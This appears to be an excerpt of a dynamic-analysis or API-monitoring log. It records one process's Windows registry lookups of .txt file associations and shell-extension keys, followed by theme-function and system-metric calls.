| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000de SubKey => ShellEx\IconHandler | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x80000000 SubKey => SystemFileAssociations\.txt | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000da Registry => 0x80000000 SubKey => .txt | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000da Data => t\x00e\x00x\x00t\x00\x00\x00 ValueName => PerceivedType | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegCloseKey | Handle => 0x000000da | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000da Registry => 0x80000000 SubKey => SystemFileAssociations\text | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000da SubKey => ShellEx\IconHandler | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000de DataLength => 0 ValueName => DocObject Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000da DataLength => 0 ValueName => DocObject Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000de DataLength => 0 ValueName => BrowseInPlace Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000da DataLength => 0 ValueName => BrowseInPlace Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000de SubKey => Clsid | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000da SubKey => Clsid | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x000000e2 Registry => 0x80000000 SubKey => * | SUCCESS | 0x00000000 | |
| 19:40:26,704 | 968 | RegOpenKeyExW | Handle => 0x00000000 Registry => 0x000000e2 SubKey => Clsid | FAILURE | 0x00000002 | |
| 19:40:26,704 | 968 | RegQueryValueExW | Handle => 0x000000de DataLength => 0 ValueName => IsShortcut Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW | Handle => 0x000000da DataLength => 0 ValueName => IsShortcut Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW | Handle => 0x000000de DataLength => 0 ValueName => AlwaysShowExt Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW | Handle => 0x000000da DataLength => 0 ValueName => AlwaysShowExt Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW | Handle => 0x000000de DataLength => 0 ValueName => NeverShowExt Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegQueryValueExW | Handle => 0x000000da DataLength => 0 ValueName => NeverShowExt Type => 0 | FAILURE | 0x00000002 | |
| 19:40:26,714 | 968 | RegCloseKey | Handle => 0x000000d6 | SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | RegCloseKey | Handle => 0x000000de | SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | RegCloseKey | Handle => 0x000000da | SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | RegCloseKey | Handle => 0x000000e2 | SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | GetSystemMetrics | SystemMetricIndex => 31 | SUCCESS | 0x00000019 | 7 times |
| 19:40:26,714 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetThemeInt FunctionAddress => 0x5ad7459d ModuleHandle => 0x5ad70000 | SUCCESS | 0x00000000 | |
| 19:40:26,714 | 968 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => DrawThemeBackground FunctionAddress => 0x5ad72bef ModuleHandle => 0x5ad70000 | SUCCESS | 0x00000000 | |
| 19:40:27,365 | 968 | GetSystemMetrics | SystemMetricIndex => 31 | SUCCESS | 0x00000019 | 7 times |